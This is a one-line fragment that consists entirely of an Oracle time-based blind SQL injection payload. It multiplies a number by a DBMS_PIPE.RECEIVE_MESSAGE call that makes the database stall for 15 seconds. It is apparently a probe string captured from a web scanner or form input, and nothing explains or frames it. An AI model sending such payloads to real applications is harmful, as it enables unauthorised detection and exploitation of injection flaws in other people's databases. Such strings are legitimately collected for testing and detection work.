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94102*DBMS_PIPE.RECEIVE_MESSAGE(CHR(99)||CHR(99)||CHR(99),15)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